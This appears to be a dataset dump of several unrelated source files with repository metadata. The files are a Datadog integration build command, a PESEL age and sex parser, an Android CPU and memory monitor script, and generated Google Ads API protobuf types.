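#   print(screen.getLanguage())   # "English" or "Spanish"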
|
[
"noreply@github.com"
] |
jldj1.noreply@github.com
|
b1c7e207adef48e14d64798fda3b81db8f9a18dc
|
dba617daf7ce09394c703d52054583d9a11084a3
|
/datadog_checks_dev/datadog_checks/dev/tooling/commands/release/build.py
|
9e45dda5fcc84926ae851302a54fc959619157a1
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
cirocosta/integrations-core
|
8bb43bca28498df410d2bab4a482eadf81954622
|
86c5e1caabaed489b19dc5cb172545fda9b99ee7
|
refs/heads/master
| 2020-12-05T12:55:19.928373
| 2020-01-06T13:37:25
| 2020-01-06T13:37:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,284
|
py
|
# (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
import click
from ....utils import basepath, dir_exists, remove_path, resolve_path
from ...constants import get_root
from ...release import build_package
from ...utils import get_valid_checks
from ..console import CONTEXT_SETTINGS, abort, echo_info, echo_success, echo_waiting
@click.command(context_settings=CONTEXT_SETTINGS, short_help='Build a wheel for a check')
@click.argument('check')
@click.option('--sdist', '-s', is_flag=True)
def build(check, sdist):
"""Build a wheel for a check as it is on the repo HEAD"""
if check in get_valid_checks():
check_dir = os.path.join(get_root(), check)
else:
check_dir = resolve_path(check)
if not dir_exists(check_dir):
abort('`{}` is not an Agent-based Integration or Python package'.format(check))
check = basepath(check_dir)
echo_waiting('Building `{}`...'.format(check))
dist_dir = os.path.join(check_dir, 'dist')
remove_path(dist_dir)
result = build_package(check_dir, sdist)
if result.code != 0:
abort(result.stdout, result.code)
echo_info('Build done, artifact(s) in: {}'.format(dist_dir))
echo_success('Success!')
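# Invocation sketch (the `ddev release` group names are inferred from this
# package's command layout; the check name is a placeholder):
#   ddev release build my_check --sdist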
|
[
"ofekmeister@gmail.com"
] |
ofekmeister@gmail.com
|
097dd9b342883a56dff4f606f3bae72c1bc304fb
|
7106ddc566b6fe2e96733414801d37566e51a0b7
|
/miscellaneous/pesel.py
|
d9cfa6ae2e894b24c6bb6a46f4b647fecd3caf62
|
[] |
no_license
|
tomelisse/PythonEx
|
11c4602b42af79adadde9a7008b8fad35f2d4c5a
|
b57773ce8d46079533ce009d92f73b7b936d3722
|
refs/heads/master
| 2021-01-02T22:57:02.947092
| 2017-08-18T15:40:02
| 2017-08-18T15:40:02
| 99,430,235
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
from datetime import date
from textwrap import wrap
def sex(n):
''' returns the sex of a person based on pesel '''
print(n)
return 'M' if n%2 else 'F'
def list_to_int(l):
''' age helper converting list of len =2 to an int '''
return 10*l[0] + l[1]
def age(birth):
''' returns the age of a person based on pesel '''
year = list_to_int(birth[:2])
month = list_to_int(birth[2:4])
day = list_to_int(birth[4:6])
if month < 13:
year = 1900 + year
elif month < 33:
year = 2000 + year
month -= 20
elif month > 80:
year = 1800 + year
month -= 80
birth = date(year, month, day)
today = date.today()
return (today-birth).days//365
def pesel():
''' returns age and sex based on pesel '''
pesel = list(map(int, wrap(input(), 1)))
a = age(pesel[:6])
s = sex(pesel[9])
return a, s
if __name__ == '__main__':
print(pesel())
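# Worked example (sketch, made-up digits): for input "99010112345" the birth
# digits "990101" give date(1999, 1, 1), so age() returns the years elapsed
# since then, and the 10th digit (index 9) is 4, so sex() returns 'F'; a month
# field of 21-32 would instead shift the year into 2000-2099.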
|
[
"tomelisse@gmail.com"
] |
tomelisse@gmail.com
|
203d43211c5a1f7a559eca0099e46670a3c1d422
|
33496338a35c4f76eadec13dc56c7831b1896113
|
/Plugins/MadaraLibrary/Source/ThirdParty/madara/maal/maal_monitor.py
|
d76607bf7d70d60435d2183f254f6e2145936afe
|
[
"BSD-2-Clause"
] |
permissive
|
jredmondson/GamsPlugins
|
1ce0c2301cf84b6398ae1a2a6cdef9a4d0c1992c
|
d133f86c263997a55f11b3b3d3344faeee60d726
|
refs/heads/master
| 2021-07-08T23:40:48.423530
| 2020-10-01T05:31:26
| 2020-10-01T05:31:26
| 196,622,579
| 3
| 1
|
BSD-2-Clause
| 2020-03-17T04:23:21
| 2019-07-12T17:54:49
|
C++
|
UTF-8
|
Python
| false
| false
| 3,341
|
py
|
#!/usr/bin/env python
## @package maal_monitor
# monitors CPU and Memory usage on an Android smartphone. Does not require monkeyrunner
# "python maal_monitor.py --help" to see available parameters.
# Imports os and system modules which we need to import Ammo scripts
import os
import sys
# Import the Ammo script library
sys.path.append(os.path.dirname(sys.argv[0]))
import maal
from optparse import OptionParser
# command line arguments
def main ():
parser = OptionParser (add_help_option=False)
parser.add_option ("--period", "--frequency", dest="period",
default=5,
help="Period of time to wait between polling for stats",
type='int')
parser.add_option ("--killtime", "--runtime", "--timeout", dest="killtime",
default=120,
help="Total time to monitor the device stats",
type='int')
parser.add_option ("--processes", "-p", dest="processes",
default=5,
help="Number of processes to display in the long format",
type='int')
parser.add_option ("--iters", "-i", "-n", dest="iters",
default=-1,
help="Optional way to specify iterations",
type='int')
parser.add_option ("-s", "--simplified", dest="simplified", default=None,
help="show a simplified output",
action='store_true')
parser.add_option ("--device", "--serial", dest="device", default=None,
help="The Android serial number for the device to call",
action='store')
parser.add_option("--outfile", "--file", dest="outfile", default=None,
help="filename to save stats to (default is stdout)",
action='store')
parser.add_option("--logcat", dest="logcat", default=None,
help="filename redirect logcat output to",
action='store')
parser.add_option("--clearlog", "--purgelog", "--flushlog", dest="clearlog", default=None,
help="clearing out the content of the log files",
action='store_true')
parser.add_option ("-h", "--help", dest="help", default=None,
help="show usage information for this script",
action='store_true')
# options can be used with options.{dest}. Args is a list of all
# unused command line arguments
(options, args) = parser.parse_args ()
if options.help:
parser.print_help ()
sys.exit (3)
# clear logcat if the user request a logcat
if options.clearlog:
maal.logcat (options.device, flush=True)
stats_file = None
if options.outfile:
stats_file = open (options.outfile, 'w')
num_attempts = options.killtime / options.period
if options.iters > 0:
num_attempts = options.iters
for n in range (num_attempts):
maal.print_device_stats (options.device, stats_file,
options.simplified, options.processes)
if n != num_attempts - 1:
maal.sleep (options.period)
if options.outfile:
stats_file.close ()
# save logs to the filename specified in --logcat
if options.logcat:
maal.logcat (options.device, file=options.logcat)
if __name__ == "__main__":
main()
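# Invocation sketch (flag names are taken from the OptionParser setup above):
#   python maal_monitor.py --device <serial> --period 5 --killtime 60 \
#       --simplified --outfile stats.txt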
|
[
"jedmondson@gmail.com"
] |
jedmondson@gmail.com
|
f9324212a0958b78f27b02d6267ce06f0db9fcec
|
eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7
|
/google/ads/googleads/v6/googleads-py/google/ads/googleads/v6/services/types/ad_group_service.py
|
09d6d7c972bdf1313bb68c51d5ca5af90fc14eda
|
[
"Apache-2.0"
] |
permissive
|
Tryweirder/googleapis-gen
|
2e5daf46574c3af3d448f1177eaebe809100c346
|
45d8e9377379f9d1d4e166e80415a8c1737f284d
|
refs/heads/master
| 2023-04-05T06:30:04.726589
| 2021-04-13T23:35:20
| 2021-04-13T23:35:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,936
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v6.enums.types import response_content_type as gage_response_content_type
from google.ads.googleads.v6.resources.types import ad_group as gagr_ad_group
from google.protobuf import field_mask_pb2 as field_mask # type: ignore
from google.rpc import status_pb2 as status # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v6.services',
marshal='google.ads.googleads.v6',
manifest={
'GetAdGroupRequest',
'MutateAdGroupsRequest',
'AdGroupOperation',
'MutateAdGroupsResponse',
'MutateAdGroupResult',
},
)
class GetAdGroupRequest(proto.Message):
r"""Request message for
[AdGroupService.GetAdGroup][google.ads.googleads.v6.services.AdGroupService.GetAdGroup].
Attributes:
resource_name (str):
Required. The resource name of the ad group
to fetch.
"""
resource_name = proto.Field(proto.STRING, number=1)
class MutateAdGroupsRequest(proto.Message):
r"""Request message for
[AdGroupService.MutateAdGroups][google.ads.googleads.v6.services.AdGroupService.MutateAdGroups].
Attributes:
customer_id (str):
Required. The ID of the customer whose ad
groups are being modified.
operations (Sequence[google.ads.googleads.v6.services.types.AdGroupOperation]):
Required. The list of operations to perform
on individual ad groups.
partial_failure (bool):
If true, successful operations will be
carried out and invalid operations will return
errors. If false, all operations will be carried
out in one transaction if and only if they are
all valid. Default is false.
validate_only (bool):
If true, the request is validated but not
executed. Only errors are returned, not results.
response_content_type (google.ads.googleads.v6.enums.types.ResponseContentTypeEnum.ResponseContentType):
The response content type setting. Determines
whether the mutable resource or just the
resource name should be returned post mutation.
"""
customer_id = proto.Field(proto.STRING, number=1)
operations = proto.RepeatedField(proto.MESSAGE, number=2,
message='AdGroupOperation',
)
partial_failure = proto.Field(proto.BOOL, number=3)
validate_only = proto.Field(proto.BOOL, number=4)
response_content_type = proto.Field(proto.ENUM, number=5,
enum=gage_response_content_type.ResponseContentTypeEnum.ResponseContentType,
)
class AdGroupOperation(proto.Message):
r"""A single operation (create, update, remove) on an ad group.
Attributes:
update_mask (google.protobuf.field_mask_pb2.FieldMask):
FieldMask that determines which resource
fields are modified in an update.
create (google.ads.googleads.v6.resources.types.AdGroup):
Create operation: No resource name is
expected for the new ad group.
update (google.ads.googleads.v6.resources.types.AdGroup):
Update operation: The ad group is expected to
have a valid resource name.
remove (str):
Remove operation: A resource name for the removed ad group
is expected, in this format:
``customers/{customer_id}/adGroups/{ad_group_id}``
"""
update_mask = proto.Field(proto.MESSAGE, number=4,
message=field_mask.FieldMask,
)
create = proto.Field(proto.MESSAGE, number=1, oneof='operation',
message=gagr_ad_group.AdGroup,
)
update = proto.Field(proto.MESSAGE, number=2, oneof='operation',
message=gagr_ad_group.AdGroup,
)
remove = proto.Field(proto.STRING, number=3, oneof='operation')
class MutateAdGroupsResponse(proto.Message):
r"""Response message for an ad group mutate.
Attributes:
partial_failure_error (google.rpc.status_pb2.Status):
Errors that pertain to operation failures in the partial
failure mode. Returned only when partial_failure = true and
all errors occur inside the operations. If any errors occur
outside the operations (e.g. auth errors), we return an RPC
level error.
results (Sequence[google.ads.googleads.v6.services.types.MutateAdGroupResult]):
All results for the mutate.
"""
partial_failure_error = proto.Field(proto.MESSAGE, number=3,
message=status.Status,
)
results = proto.RepeatedField(proto.MESSAGE, number=2,
message='MutateAdGroupResult',
)
class MutateAdGroupResult(proto.Message):
r"""The result for the ad group mutate.
Attributes:
resource_name (str):
Returned for successful operations.
ad_group (google.ads.googleads.v6.resources.types.AdGroup):
The mutated ad group with only mutable fields after mutate.
The field will only be returned when response_content_type
is set to "MUTABLE_RESOURCE".
"""
resource_name = proto.Field(proto.STRING, number=1)
ad_group = proto.Field(proto.MESSAGE, number=2,
message=gagr_ad_group.AdGroup,
)
__all__ = tuple(sorted(__protobuf__.manifest))
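# Construction sketch (proto-plus messages accept keyword fields; the IDs below
# are placeholders):
#   op = AdGroupOperation(remove="customers/123/adGroups/456")
#   request = MutateAdGroupsRequest(customer_id="123", operations=[op],
#                                   validate_only=True)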
|
[
"bazel-bot-development[bot]@users.noreply.github.com"
] |
bazel-bot-development[bot]@users.noreply.github.com
|